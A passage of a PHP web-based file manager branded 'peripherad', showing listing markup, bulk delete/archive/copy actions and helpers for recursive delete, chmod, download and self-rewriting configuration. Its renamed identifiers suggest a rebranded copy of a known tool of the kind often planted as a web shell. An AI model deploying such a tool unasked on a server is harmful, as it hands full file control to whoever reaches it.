                        <a title="<?php echo lng('DirectLink') ?>" href="<?php echo fanco(FM_ROOT_URL . (FM_PATH != '' ? '/' . FM_PATH : '') . '/' . $f) ?>" target="_blank"><i class="fa fa-link"></i></a>
                        <a title="<?php echo lng('Download') ?>" href="?p=<?php echo urlencode(FM_PATH) ?>&amp;dl=<?php echo urlencode($f) ?>" onclick="confirmDailog(event, 1211, '<?php echo lng('Download'); ?>','<?php echo urlencode($f); ?>', this.href);"><i class="fa fa-download"></i></a>
                    </td>
                </tr>
                <?php
                flush();
                $ik++;
            }

            if (empty($folders) and empty($files)) { ?>
                <tfoot>
                    <tr><?php if (!FM_READONLY): ?>
                            <td></td><?php endif; ?>
                        <td colspan="<?php echo (!FM_IS_WIN and !$hide_Cols) ? '6' : '4' ?>"><em><?php echo lng('Folder is empty') ?></em></td>
                    </tr>
                </tfoot>
                <?php
            } else { ?>
                <tfoot>
                    <tr>
                        <td class="gray" colspan="<?php echo (!FM_IS_WIN and !$hide_Cols) ? (FM_READONLY ? '6' :'7') : (FM_READONLY ? '4' : '5') ?>">
                            <?php echo lng('FullSize').': <span class="badge text-bg-light border-radius-0">'.fm_get_filesize($all_files_size).'</span>' ?>
                            <?php echo lng('File').': <span class="badge text-bg-light border-radius-0">'.$num_files.'</span>' ?>
                            <?php echo lng('Folder').': <span class="badge text-bg-light border-radius-0">'.$num_folders.'</span>' ?>
                        </td>
                    </tr>
                </tfoot>
                <?php } ?>
        </table>
    </div>

    <div class="row">
        <?php if (!FM_READONLY): ?>
        <div class="col-xs-12 col-sm-9">
            <ul class="list-inline footer-action">
                <li class="list-inline-item"> <a href="#/select-all" class="btn btn-small btn-outline-primary btn-2" onclick="select_all();return false;"><i class="fa fa-check-square"></i> <?php echo lng('SelectAll') ?> </a></li>
                <li class="list-inline-item"><a href="#/unselect-all" class="btn btn-small btn-outline-primary btn-2" onclick="unselect_all();return false;"><i class="fa fa-window-close"></i> <?php echo lng('UnSelectAll') ?> </a></li>
                <li class="list-inline-item"><a href="#/invert-all" class="btn btn-small btn-outline-primary btn-2" onclick="invert_all();return false;"><i class="fa fa-th-list"></i> <?php echo lng('InvertSelection') ?> </a></li>
                <li class="list-inline-item"><input type="submit" class="hidden" name="delete" id="a-delete" value="Delete" onclick="return confirm('<?php echo lng('Delete selected files and folders?'); ?>')">
                    <a href="javascript:document.getElementById('a-delete').click();" class="btn btn-small btn-outline-primary btn-2"><i class="fa fa-trash"></i> <?php echo lng('Delete') ?> </a></li>
                <li class="list-inline-item"><input type="submit" class="hidden" name="zip" id="a-zip" value="zip" onclick="return confirm('<?php echo lng('Create archive?'); ?>')">
                    <a href="javascript:document.getElementById('a-zip').click();" class="btn btn-small btn-outline-primary btn-2"><i class="fa fa-file-archive-o"></i> <?php echo lng('Zip') ?> </a></li>
                <li class="list-inline-item"><input type="submit" class="hidden" name="tar" id="a-tar" value="tar" onclick="return confirm('<?php echo lng('Create archive?'); ?>')">
                    <a href="javascript:document.getElementById('a-tar').click();" class="btn btn-small btn-outline-primary btn-2"><i class="fa fa-file-archive-o"></i> <?php echo lng('Tar') ?> </a></li>
                <li class="list-inline-item"><input type="submit" class="hidden" name="copy" id="a-copy" value="Copy">
                    <a href="javascript:document.getElementById('a-copy').click();" class="btn btn-small btn-outline-primary btn-2"><i class="fa fa-files-o"></i> <?php echo lng('Copy') ?> </a></li>
            </ul>
        </div>
        <div class="col-3 d-none d-sm-block"><a href="." target="_blank" class="float-right text-muted">peripherad <?php echo VERSION; ?></a></div>
        <?php else: ?>
            <div class="col-12"><a href="." target="_blank" class="float-right text-muted">peripherad <?php echo VERSION; ?></a></div>
        <?php endif; ?>
    </div>
</form>

<?php
fm_show_footer();


function print_external($key) {
    global $external;

    if(!array_key_exists($key, $external)) {
        // throw new Exception('Key missing in external: ' . key);
        echo "<!-- EXTERNAL: MISSING KEY $key -->";
        return;
    }

    echo "$external[$key]";
}


function verifyToken($token) 
{
    if (hash_equals($_SESSION['token'], $token)) { 
        return true;
    }
    return false;
}

/**
 * Delete  file or folder (recursively)
 * @param string $path
 * @return bool
 */
function fm_rdelete($path)
{
    if (is_link($path)) {
        return unlink($path);
    } elseif (is_dir($path)) {
        $objects = scandir($path);
        $ok = true;
        if (is_array($objects)) {
            foreach ($objects as $file) {
                if ($file != '.' and $file != '..') {
                    if (!fm_rdelete($path . '/' . $file)) {
                        $ok = false;
                    }
                }
            }
        }
        return ($ok) ? rmdir($path) : false;
    } elseif (is_file($path)) {
        return unlink($path);
    }
    return false;
}


function fm_rchmod($path, $filemode, $dirmode)
{
    if (is_dir($path)) {
        if (!chmod($path, $dirmode)) {
            return false;
        }
        $objects = scandir($path);
        if (is_array($objects)) {
            foreach ($objects as $file) {
                if ($file != '.' and $file != '..') {
                    if (!fm_rchmod($path . '/' . $file, $filemode, $dirmode)) {
                        return false;
                    }
                }
            }
        }
        return true;
    } elseif (is_link($path)) {
        return true;
    } elseif (is_file($path)) {
        return chmod($path, $filemode);
    }
    return false;
}


function fm_is_valid_ext($filename)
{
    $allowed = (FM_FILE_EXTENSION) ? explode(',', FM_FILE_EXTENSION) : false;

    $ext = pathinfo($filename, PATHINFO_EXTENSION);
    $isFileAllowed = ($allowed) ? in_array($ext, $allowed) : true;

    return ($isFileAllowed) ? true : false;
}


function fm_rename($old, $new)
{
    $isFileAllowed = fm_is_valid_ext($new);

    if(!is_dir($old)) {
        if (!$isFileAllowed) return false;
    }

    return (!file_exists($new) and file_exists($old)) ? rename($old, $new) : null;
}


function fm_rcopy($path, $dest, $upd = true, $force = true)
{
    if (is_dir($path)) {
        if (!fm_mkdir($dest, $force)) {
            return false;
        }
        $objects = scandir($path);
        $ok = true;
        if (is_array($objects)) {
            foreach ($objects as $file) {
                if ($file != '.' and $file != '..') {
                    if (!fm_rcopy($path . '/' . $file, $dest . '/' . $file)) {
                        $ok = false;
                    }
                }
            }
        }
        return $ok;
    } elseif (is_file($path)) {
        return fm_copy($path, $dest, $upd);
    }
    return false;
}


function fm_mkdir($dir, $force)
{
    if (file_exists($dir)) {
        if (is_dir($dir)) {
            return $dir;
        } elseif (!$force) {
            return false;
        }
        unlink($dir);
    }
    return mkdir($dir, 0777, true);
}


function fm_copy($f1, $f2, $upd)
{
    $time1 = filemtime($f1);
    if (file_exists($f2)) {
        $time2 = filemtime($f2);
        if ($time2 >= $time1 and $upd) {
            return false;
        }
    }
    $ok = copy($f1, $f2);
    if ($ok) {
        touch($f2, $time1);
    }
    return $ok;
}


function fm_get_mime_type($file_path)
{
    if (function_exists('finfo_open')) {
        $finfo = finfo_open(FILEINFO_MIME_TYPE);
        $mime = finfo_file($finfo, $file_path);
        finfo_close($finfo);
        return $mime;
    } elseif (function_exists('mime_content_type')) {
        return mime_content_type($file_path);
    } elseif (!stristr(ini_get('disable_functions'), 'shell_exec')) {
        $file = escapeshellarg($file_path);
        $mime = shell_exec('file -bi ' . $file);
        return $mime;
    } else {
        return '--';
    }
}


function fm_redirect($url, $code = 302)
{
    header('Location: ' . $url, true, $code);
    exit;
}


function get_absolute_path($path) {
    $path = str_replace(array('/', '\\'), DIRECTORY_SEPARATOR, $path);
    $parts = array_filter(explode(DIRECTORY_SEPARATOR, $path), 'strlen');
    $absolutes = array();
    foreach ($parts as $part) {
        if ('.' == $part) continue;
        if ('..' == $part) {
            array_pop($absolutes);
        } else {
            $absolutes[] = $part;
        }
    }
    return implode(DIRECTORY_SEPARATOR, $absolutes);
}


function fm_clean_path($path, $trim = true)
{
    $path = $trim ? trim($path) : $path;
    $path = trim($path, '\\/');
    $path = str_replace(array('../', '..\\'), '', $path);
    $path =  get_absolute_path($path);
    if ($path == '..') {
        $path = '';
    }
    return str_replace('\\', '/', $path);
}


function fm_get_parent_path($path)
{
    $path = fm_clean_path($path);
    if ($path != '') {
        $array = explode('/', $path);
        if (count($array) > 1) {
            $array = array_slice($array, 0, -1);
            return implode('/', $array);
        }
        return '';
    }
    return false;
}

function fm_get_display_path($file_path)
{
    global $path_display_mode, $root_path, $root_url;
    switch ($path_display_mode) {
        case 'relative':
            return array(
                'label' => 'Path',
                'path' => fanco(fm_convert_win(str_replace($root_path, '', $file_path)))
            );
        case 'host':
            $relative_path = str_replace($root_path, '', $file_path);
            return array(
                'label' => 'Host Path',
                'path' => fanco(fm_convert_win('/' . $root_url . '/' . ltrim(str_replace('\\', '/', $relative_path), '/')))
            );
        case 'full':
        default:
            return array(
                'label' => 'Full Path',
                'path' => fanco(fm_convert_win($file_path))
            );
    }
}


function fm_is_exclude_items($file) {
    $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
    if (isset($exclude_items) and sizeof($exclude_items)) {
        unset($exclude_items);
    }

    $exclude_items = FM_EXCLUDE_ITEMS;
    if (version_compare(PHP_VERSION, '7.0.0', '<')) {
        $exclude_items = unserialize($exclude_items);
    }
    if (!in_array($file, $exclude_items) and !in_array("*.$ext", $exclude_items)) {
        return true;
    }
    return false;
}


function fm_get_translations($tr) {
    try {
        $content = @file_get_contents('translation.json');
        if($content !== FALSE) {
            $lng = json_decode($content, TRUE);
            global $lang_list;
            foreach ($lng["language"] as $key => $value)
            {
                $code = $value["code"];
                $lang_list[$code] = $value["name"];
                if ($tr)
                    $tr[$code] = $value["translation"];
            }
            return $tr;
        }

    }
    catch (Exception $e) {
        echo $e;
    }
}


function fm_get_size($file)
{
    static $iswin;
    static $isdarwin;
    if (!isset($iswin)) {
        $iswin = (strtoupper(substr(PHP_OS, 0, 3)) == 'WIN');
    }
    if (!isset($isdarwin)) {
        $isdarwin = (strtoupper(substr(PHP_OS, 0)) == "DARWIN");
    }

    static $exec_works;
    if (!isset($exec_works)) {
        $exec_works = (function_exists('exec') and !ini_get('safe_mode') and @exec('echo EXEC') == 'EXEC');
    }

    // try a shell command
    if ($exec_works) {
        $arg = escapeshellarg($file);
        $cmd = ($iswin) ? "for %F in (\"$file\") do @echo %~zF" : ($isdarwin ? "stat -f%z $arg" : "stat -c%s $arg");
        @exec($cmd, $output);
        if (is_array($output) and ctype_digit($size = trim(implode("\n", $output)))) {
            return $size;
        }
    }

    // try the Windows COM interface
    if ($iswin and class_exists("COM")) {
        try {
            $fsobj = new COM('Scripting.FileSystemObject');
            $f = $fsobj->GetFile( realpath($file) );
            $size = $f->Size;
        } catch (Exception $e) {
            $size = null;
        }
        if (ctype_digit($size)) {
            return $size;
        }
    }

    // if all else fails
    return filesize($file);
}


function fm_get_filesize($size)
{
    $size = (float) $size;
    $units = array('B', 'KB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB');
    $power = ($size > 0) ? floor(log($size, 1024)) : 0;
    $power = ($power > (count($units) - 1)) ? (count($units) - 1) : $power;
    return sprintf('%s %s', round($size / pow(1024, $power), 2), $units[$power]);
}


function fm_get_directorysize($directory) {
    $bytes = 0;
    $directory = realpath($directory);
    if ($directory !== false and $directory != '' and file_exists($directory)){
        foreach(new RecursiveIteratorIterator(new RecursiveDirectoryIterator($directory, FilesystemIterator::SKIP_DOTS)) as $file){
            $bytes += $file->getSize();
        }
    }
    return $bytes;
}


function fm_get_zif_info($path, $ext) {
    if ($ext == 'zip' and function_exists('zip_open')) {
        $arch = @zip_open($path);
        if ($arch) {
            $filenames = array();
            while ($zip_entry = @zip_read($arch)) {
                $zip_name = @zip_entry_name($zip_entry);
                $zip_folder = substr($zip_name, -1) == '/';
                $filenames[] = array(
                    'name' => $zip_name,
                    'filesize' => @zip_entry_filesize($zip_entry),
                    'compressed_size' => @zip_entry_compressedsize($zip_entry),
                    'folder' => $zip_folder
                );
            }
            @zip_close($arch);
            return $filenames;
        }
    } elseif($ext == 'tar' and class_exists('PharData')) {
        $archive = new PharData($path);
        $filenames = array();
        foreach(new RecursiveIteratorIterator($archive) as $file) {
            $parent_info = $file->getPathInfo();
            $zip_name = str_replace("ph" . "ar://".$path, '', $file->getPathName());
            $zip_name = substr($zip_name, ($pos = strpos($zip_name, '/')) !== false ? $pos + 1 : 0);
            $zip_folder = $parent_info->getFileName();
            $zip_info = new SplFileInfo($file);
            $filenames[] = array(
                'name' => $zip_name,
                'filesize' => $zip_info->getSize(),
                'compressed_size' => $file->getCompressedSize(),
                'folder' => $zip_folder
            );
        }
        return $filenames;
    }
    return false;
}


function fanco($text)
{
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
}

function fm_isvalid_filename($text) {
    return (strpbrk($text, '/?%*:|"<>') === FALSE) ? true : false;
}


function fm_set_msg($msg, $status = 'ok')
{
    $_SESSION[DN_CESSION_ID]['message'] = $msg;
    $_SESSION[DN_CESSION_ID]['status'] = $status;
}


function fm_is_utf8($string)
{
    return preg_match('//u', $string);
}


function fm_convert_win($filename)
{
    if (FM_IS_WIN and function_exists('iconv')) {
        $filename = iconv(FM_ICONV_INPUT_ENC, 'UTF-8//IGNORE', $filename);
    }
    return $filename;
}


function fm_object_to_array($obj)
{
    if (!is_object($obj) and !is_array($obj)) {
        return $obj;
    }
    if (is_object($obj)) {
        $obj = get_object_vars($obj);
    }
    return array_map('fm_object_to_array', $obj);
}


function fm_get_file_icon_class($path)
{
    // get extension
    $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));

    switch ($ext) {
        case 'ico':
        case 'gif':
        case 'jpg':
        case 'jpeg':
        case 'jpc':
        case 'jp2':
        case 'jpx':
        case 'xbm':
        case 'wbmp':
        case 'png':
        case 'bmp':
        case 'tif':
        case 'tiff':
        case 'webp':
        case 'avif':
        case 'svg':
            $img = 'fa fa-picture-o';
            break;
        case 'passwd':
        case 'ftpquota':
        case 'sql':
        case 'js':
        case 'ts':
        case 'jsx':
        case 'tsx':
        case 'hbs':
        case 'json':
        case 'sh':
        case 'config':
        case 'twig':
        case 'tpl':
        case 'md':
        case 'gitignore':
        case 'c':
        case 'cpp':
        case 'cs':
        case 'py':
        case 'rs':
        case 'map':
        case 'lock':
        case 'dtd':
            $img = 'fa fa-file-code-o';
            break;
        case 'txt':
        case 'ini':
        case 'conf':
        case 'log':
        case 'htaccess':
        case 'yaml':
        case 'yml':
        case 'toml':
        case 'tmp':
        case 'top':
        case 'bot':
        case 'dat':
        case 'bak':
        case 'htpasswd':
        case 'pl':
            $img = 'fa fa-file-text-o';
            break;
        case 'css':
        case 'less':
        case 'sass':
        case 'scss':
            $img = 'fa fa-css3';
            break;
        case 'bz2':
        case 'tbz2':
        case 'tbz':
        case 'zip':
        case 'rar':
        case 'gz':
        case 'tgz':
        case 'tar':
        case '7z':
        case 'xz':
        case 'txz':
        case 'zst':
        case 'tzst':
            $img = 'fa fa-file-archive-o';
            break;
        case 'php':
        case 'php4':
        case 'php5':
        case 'phps':
        case 'phtml':
            $img = 'fa fa-code';
            break;
        case 'htm':
        case 'html':
        case 'shtml':
        case 'xhtml':
            $img = 'fa fa-html5';
            break;
        case 'xml':
        case 'xsl':
            $img = 'fa fa-file-excel-o';
            break;
        case 'wav':
        case 'mp3':
        case 'mp2':
        case 'm4a':
        case 'aac':
        case 'ogg':
        case 'oga':
        case 'wma':
        case 'mka':
        case 'flac':
        case 'ac3':
        case 'tds':
            $img = 'fa fa-music';
            break;
        case 'm3u':
        case 'm3u8':
        case 'pls':
        case 'cue':
        case 'xspf':
            $img = 'fa fa-headphones';
            break;
        case 'avi':
        case 'mpg':
        case 'mpeg':
        case 'mp4':
        case 'm4v':
        case 'flv':
        case 'f4v':
        case 'ogm':
        case 'ogv':
        case 'mov':
        case 'mkv':
        case '3gp':
        case 'asf':
        case 'wmv':
        case 'webm':
            $img = 'fa fa-file-video-o';
            break;
        case 'eml':
        case 'msg':
            $img = 'fa fa-envelope-o';
            break;
        case 'xls':
        case 'xlsx':
        case 'ods':
            $img = 'fa fa-file-excel-o';
            break;
        case 'csv':
            $img = 'fa fa-file-text-o';
            break;
        case 'bak':
        case 'swp':
            $img = 'fa fa-clipboard';
            break;
        case 'doc':
        case 'docx':
        case 'odt':
            $img = 'fa fa-file-word-o';
            break;
        case 'ppt':
        case 'pptx':
            $img = 'fa fa-file-powerpoint-o';
            break;
        case 'ttf':
        case 'ttc':
        case 'otf':
        case 'woff':
        case 'woff2':
        case 'eot':
        case 'fon':
            $img = 'fa fa-font';
            break;
        case 'pdf':
            $img = 'fa fa-file-pdf-o';
            break;
        case 'psd':
        case 'ai':
        case 'eps':
        case 'fla':
        case 'swf':
            $img = 'fa fa-file-image-o';
            break;
        case 'exe':
        case 'msi':
            $img = 'fa fa-file-o';
            break;
        case 'bat':
            $img = 'fa fa-terminal';
            break;
        default:
            $img = 'fa fa-info-circle';
    }

    return $img;
}


function fm_get_image_exts()
{
    return array('ico', 'gif', 'jpg', 'jpeg', 'jpc', 'jp2', 'jpx', 'xbm', 'wbmp', 'png', 'bmp', 'tif', 'tiff', 'psd', 'svg', 'webp', 'avif');
}


function fm_get_video_exts()
{
    return array('avi', 'webm', 'wmv', 'mp4', 'm4v', 'ogm', 'ogv', 'mov', 'mkv');
}


function fm_get_audio_exts()
{
    return array('wav', 'mp3', 'ogg', 'm4a');
}


function fm_get_text_exts()
{
    return array(
        'txt', 'css', 'ini', 'conf', 'log', 'htaccess', 'passwd', 'ftpquota', 'sql', 'js', 'ts', 'jsx', 'tsx', 'mjs', 'json', 'sh', 'config',
        'php', 'php4', 'php5', 'phps', 'phtml', 'htm', 'html', 'shtml', 'xhtml', 'xml', 'xsl', 'm3u', 'm3u8', 'pls', 'cue', 'bash', 'vue',
        'eml', 'msg', 'csv', 'bat', 'twig', 'tpl', 'md', 'gitignore', 'less', 'sass', 'scss', 'c', 'cpp', 'cs', 'py', 'go', 'zsh', 'swift',
        'map', 'lock', 'dtd', 'svg', 'asp', 'aspx', 'asx', 'asmx', 'ashx', 'jsp', 'jspx', 'cgi', 'dockerfile', 'ruby', 'yml', 'yaml', 'toml',
        'vhost', 'scpt', 'applescript', 'csx', 'cshtml', 'c++', 'coffee', 'cfm', 'rb', 'graphql', 'mustache', 'jinja', 'http', 'handlebars',
        'java', 'es', 'es6', 'markdown', 'wiki', 'tmp', 'top', 'bot', 'dat', 'bak', 'htpasswd', 'pl'
    );
}


function fm_get_text_mimes()
{
    return array(
        'application/xml',
        'application/javascript',
        'application/x-javascript',
        'image/svg+xml',
        'message/rfc822',
        'application/json',
    );
}


function fm_get_text_names()
{
    return array(
        'license',
        'readme',
        'authors',
        'contributors',
        'changelog',
    );
}


function fm_get_onlineViewer_exts()
{
    return array('doc', 'docx', 'xls', 'xlsx', 'pdf', 'ppt', 'pptx', 'ai', 'psd', 'dxf', 'xps', 'rar', 'odt', 'ods');
}

function fm_get_file_mimes($extension)
{
    $fileTypes['swf'] = 'application/x-shockwave-flash';
    $fileTypes['pdf'] = 'application/pdf';
    $fileTypes['exe'] = 'application/octet-stream';
    $fileTypes['zip'] = 'application/zip';
    $fileTypes['doc'] = 'application/msword';
    $fileTypes['xls'] = 'application/vnd.ms-excel';
    $fileTypes['ppt'] = 'application/vnd.ms-powerpoint';
    $fileTypes['gif'] = 'image/gif';
    $fileTypes['png'] = 'image/png';
    $fileTypes['jpeg'] = 'image/jpg';
    $fileTypes['jpg'] = 'image/jpg';
    $fileTypes['webp'] = 'image/webp';
    $fileTypes['avif'] = 'image/avif';
    $fileTypes['rar'] = 'application/rar';

    $fileTypes['ra'] = 'audio/x-pn-realaudio';
    $fileTypes['ram'] = 'audio/x-pn-realaudio';
    $fileTypes['ogg'] = 'audio/x-pn-realaudio';

    $fileTypes['wav'] = 'video/x-msvideo';
    $fileTypes['wmv'] = 'video/x-msvideo';
    $fileTypes['avi'] = 'video/x-msvideo';
    $fileTypes['asf'] = 'video/x-msvideo';
    $fileTypes['divx'] = 'video/x-msvideo';

    $fileTypes['mp3'] = 'audio/mpeg';
    $fileTypes['mp4'] = 'audio/mpeg';
    $fileTypes['mpeg'] = 'video/mpeg';
    $fileTypes['mpg'] = 'video/mpeg';
    $fileTypes['mpe'] = 'video/mpeg';
    $fileTypes['mov'] = 'video/quicktime';
    $fileTypes['swf'] = 'video/quicktime';
    $fileTypes['3gp'] = 'video/quicktime';
    $fileTypes['m4a'] = 'video/quicktime';
    $fileTypes['aac'] = 'video/quicktime';
    $fileTypes['m3u'] = 'video/quicktime';

    $fileTypes['php'] = ['application/x-php'];
    $fileTypes['html'] = ['text/html'];
    $fileTypes['txt'] = ['text/plain'];
    //Unknown mime-types should be 'application/octet-stream'
    if(empty($fileTypes[$extension])) {
      $fileTypes[$extension] = ['application/octet-stream'];
    }
    return $fileTypes[$extension];
}


 function scan($dir = '', $filter = '') {
    $path = FM_ROOT_PATH.'/'.$dir;
     if($path) {
         $ite = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path));
         $rii = new RegexIterator($ite, "/(" . $filter . ")/i");

         $files = array();
         foreach ($rii as $file) {
             if (!$file->isDir()) {
                 $fileName = $file->getFilename();
                 $location = str_replace(FM_ROOT_PATH, '', $file->getPath());
                 $files[] = array(
                     "name" => $fileName,
                     "type" => "file",
                     "path" => $location,
                 );
             }
         }
         return $files;
     }
}


function fm_download_file($fileLocation, $fileName, $chunkSize  = 1024)
{
    if (connection_status() != 0)
        return (false);
    $extension = pathinfo($fileName, PATHINFO_EXTENSION);

    $contentType = fm_get_file_mimes($extension);

    $size = filesize($fileLocation);

    if ($size == 0) {
        fm_set_msg(lng('Zero byte file! Aborting download'), 'error');
        $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));

        return (false);
    }

    @ini_set('magic_quotes_runtime', 0);
    $fp = fopen("$fileLocation", "rb");

    if ($fp === false) {
        fm_set_msg(lng('Cannot open file! Aborting download'), 'error');
        $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
        return (false);
    }

    // headers
    header('Content-Description: File Transfer');
    header('Expires: 0');
    header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
    header('Pragma: public');
    header("Content-Transfer-Encoding: binary");
    header("Content-Type: $contentType");

    $contentDisposition = 'attachment';

    if (strstr($_SERVER['HTTP_USER_AGENT'], "MSIE")) {
        $fileName = preg_replace('/\./', '%2e', $fileName, substr_count($fileName, '.') - 1);
        header("Content-Disposition: $contentDisposition;filename=\"$fileName\"");
    } else {
        header("Content-Disposition: $contentDisposition;filename=\"$fileName\"");
    }

    header("Accept-Ranges: bytes");
    $range = 0;

    if (isset($_SERVER['HTTP_RANGE'])) {
        list($a, $range) = explode("=", $_SERVER['HTTP_RANGE']);
        str_replace($range, "-", $range);
        $size2 = $size - 1;
        $new_length = $size - $range;
        header("HTTP/1.1 206 Partial Content");
        header("Content-Length: $new_length");
        header("Content-Range: bytes $range$size2/$size");
    } else {
        $size2 = $size - 1;
        header("Content-Range: bytes 0-$size2/$size");
        header("Content-Length: " . $size);
    }
    $fileLocation = realpath($fileLocation);
    while (ob_get_level()) ob_end_clean();
    readfile($fileLocation);

    fclose($fp);

    return ((connection_status() == 0) and !connection_aborted());
}

function fm_get_theme() {
    $result = '';
    if(FM_THEME == "dark") {
        $result = "text-white bg-dark";
    }
    return $result;
}

class FM_Zipper
{
    private $zip;

    public function __construct()
    {
        $this->zip = new ZipArchive();
    }

    public function create($filename, $files)
    {
        $res = $this->zip->open($filename, ZipArchive::CREATE);
        if ($res !== true) {
            return false;
        }
        if (is_array($files)) {
            foreach ($files as $f) {
                $f = fm_clean_path($f);
                if (!$this->addFileOrDir($f)) {
                    $this->zip->close();
                    return false;
                }
            }
            $this->zip->close();
            return true;
        } else {
            if ($this->addFileOrDir($files)) {
                $this->zip->close();
                return true;
            }
            return false;
        }
    }


    public function unzip($filename, $path)
    {
        $res = $this->zip->open($filename);
        if ($res !== true) {
            return false;
        }
        if ($this->zip->extractTo($path)) {
            $this->zip->close();
            return true;
        }
        return false;
    }


    private function addFileOrDir($filename)
    {
        if (is_file($filename)) {
            return $this->zip->addFile($filename);
        } elseif (is_dir($filename)) {
            return $this->addDir($filename);
        }
        return false;
    }


    private function addDir($path)
    {
        if (!$this->zip->addEmptyDir($path)) {
            return false;
        }
        $objects = scandir($path);
        if (is_array($objects)) {
            foreach ($objects as $file) {
                if ($file != '.' and $file != '..') {
                    if (is_dir($path . '/' . $file)) {
                        if (!$this->addDir($path . '/' . $file)) {
                            return false;
                        }
                    } elseif (is_file($path . '/' . $file)) {
                        if (!$this->zip->addFile($path . '/' . $file)) {
                            return false;
                        }
                    }
                }
            }
            return true;
        }
        return false;
    }
}


class FM_Zipper_Tar
{
    private $tar;

    public function __construct()
    {
        $this->tar = null;
    }


    public function create($filename, $files)
    {
        $this->tar = new PharData($filename);
        if (is_array($files)) {
            foreach ($files as $f) {
                $f = fm_clean_path($f);
                if (!$this->addFileOrDir($f)) {
                    return false;
                }
            }
            return true;
        } else {
            if ($this->addFileOrDir($files)) {
                return true;
            }
            return false;
        }
    }


    public function unzip($filename, $path)
    {
        $res = $this->tar->open($filename);
        if ($res !== true) {
            return false;
        }
        if ($this->tar->extractTo($path)) {
            return true;
        }
        return false;
    }

    /**
     * Add file/folder to archive
     * @param string $filename
     * @return bool
     */
    private function addFileOrDir($filename)
    {
        if (is_file($filename)) {
            try {
                $this->tar->addFile($filename);
                return true;
            } catch (Exception $e) {
                return false;
            }
        } elseif (is_dir($filename)) {
            return $this->addDir($filename);
        }
        return false;
    }


    private function addDir($path)
    {
        $objects = scandir($path);
        if (is_array($objects)) {
            foreach ($objects as $file) {
                if ($file != '.' and $file != '..') {
                    if (is_dir($path . '/' . $file)) {
                        if (!$this->addDir($path . '/' . $file)) {
                            return false;
                        }
                    } elseif (is_file($path . '/' . $file)) {
                        try {
                            $this->tar->addFile($path . '/' . $file);
                        } catch (Exception $e) {
                            return false;
                        }
                    }
                }
            }
            return true;
        }
        return false;
    }
}


 class FM_Config
{
     var $data;

    function __construct()
    {
        global $root_path, $root_url, $CONFIG;
        $fm_url = $root_url.$_SERVER["PHP_SELF"];
        $this->data = array(
            'lang' => 'en',
            'error_reporting' => true,
            'show_hidden' => true
        );
        $data = false;
        if (strlen($CONFIG)) {
            $data = fm_object_to_array(json_decode($CONFIG));
        } else {
            $msg = 'peripherad<br>Error: Cannot load configuration';
            if (substr($fm_url, -1) == '/') {
                $fm_url = rtrim($fm_url, '/');
                $msg .= '<br>';
                $msg .= '<br>Seems like you have a trailing slash on the URL.';
                $msg .= '<br>Try this link: <a href="' . $fm_url . '">' . $fm_url . '</a>';
            }
            die($msg);
        }
        if (is_array($data) and count($data)) $this->data = $data;
        else $this->save();
    }

    function save()
    {
        $fm_file = __FILE__;
        $var_name = '$CONFIG';
        $var_value = var_export(json_encode($this->data), true);
        $config_string = "<?php" . chr(13) . chr(10) . "//Default Configuration".chr(13) . chr(10)."$var_name = $var_value;" . chr(13) . chr(10);
        if (is_writable($fm_file)) {
            $lines = file($fm_file);
            if ($fh = @fopen($fm_file, "w")) {
                @fputs($fh, $config_string, strlen($config_string));
                for ($x = 3; $x < count($lines); $x++) {
                    @fputs($fh, $lines[$x], strlen($lines[$x]));
                }
                @fclose($fh);
            }
        }
    }
}


function fm_show_nav_path($path)
{
    global $lang, $sticky_navbar, $editFile;
    $isStickyNavBar = $sticky_navbar ? 'fixed-top' : '';
    $getTheme = fm_get_theme();
    $getTheme .= " navbar-light";
    if(FM_THEME == "dark") {
        $getTheme .= " navbar-dark";
    } else {
        $getTheme .= " bg-white";
    }
    ?>
    <nav class="navbar navbar-expand-lg <?php echo $getTheme; ?> mb-4 main-nav <?php echo $isStickyNavBar ?>">
        <a class="navbar-brand"> <?php echo lng('AppTitle') ?> </a>
        <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
            <span class="navbar-toggler-icon"></span>
        </button>
        <div class="collapse navbar-collapse" id="navbarSupportedContent">

            <?php
            $path = fm_clean_path($path);
            $root_url = "<a href='?p='><i class='fa fa-home' aria-hidden='true' title='" . FM_ROOT_PATH . "'></i></a>";
            $sep = '<i class="bread-crumb"> / </i>';
            if ($path != '') {
                $exploded = explode('/', $path);
                $count = count($exploded);
                $array = array();
                $parent = '';
                for ($i = 0; $i < $count; $i++) {
                    $parent = trim($parent . '/' . $exploded[$i], '/');
                    $parent_enc = urlencode($parent);
                    $array[] = "<a href='?p={$parent_enc}'>" . fanco(fm_convert_win($exploded[$i])) . "</a>";
                }
                $root_url .= $sep . implode($sep, $array);
            }
            echo '<div class="col-xs-6 col-sm-5">' . $root_url . $editFile . '</div>';
            ?>

            <div class="col-xs-6 col-sm-7">
                <ul class="navbar-nav justify-content-end <?php echo fm_get_theme();  ?>">
                    <li class="nav-item mr-2">
                        <div class="input-group input-group-sm mr-1" style="margin-top:4px;">
                            <input type="text" class="form-control" placeholder="<?php echo lng('Search') ?>" aria-label="<?php echo lng('Search') ?>" aria-describedby="search-addon2" id="search-addon">
                            <div class="input-group-append">
                                <span class="input-group-text brl-0 brr-0" id="search-addon2"><i class="fa fa-search"></i></span>
                            </div>
                            <div class="input-group-append btn-group">
                                <span class="input-group-text dropdown-toggle brl-0" data-bs-toggle="dropdown" aria-haspopup="true" aria-expanded="false"></span>
                                  <div class="dropdown-menu dropdown-menu-right">
                                    <a class="dropdown-item" href="<?php echo $path2 = $path ? $path : '.'; ?>" id="js-search-modal" data-bs-toggle="modal" data-bs-target="#searchModal"><?php echo lng('Advanced Search') ?></a>
                                  </div>
                            </div>
                        </div>
                    </li>
                    <?php if (!FM_READONLY): ?>
                    <li class="nav-item">
                        <a title="<?php echo lng('Upload') ?>" class="nav-link" href="?p=<?php echo urlencode(FM_PATH) ?>&amp;upload"><i class="fa fa-cloud-upload" aria-hidden="true"></i> <?php echo lng('Upload') ?></a>
                    </li>
                    <li class="nav-item">
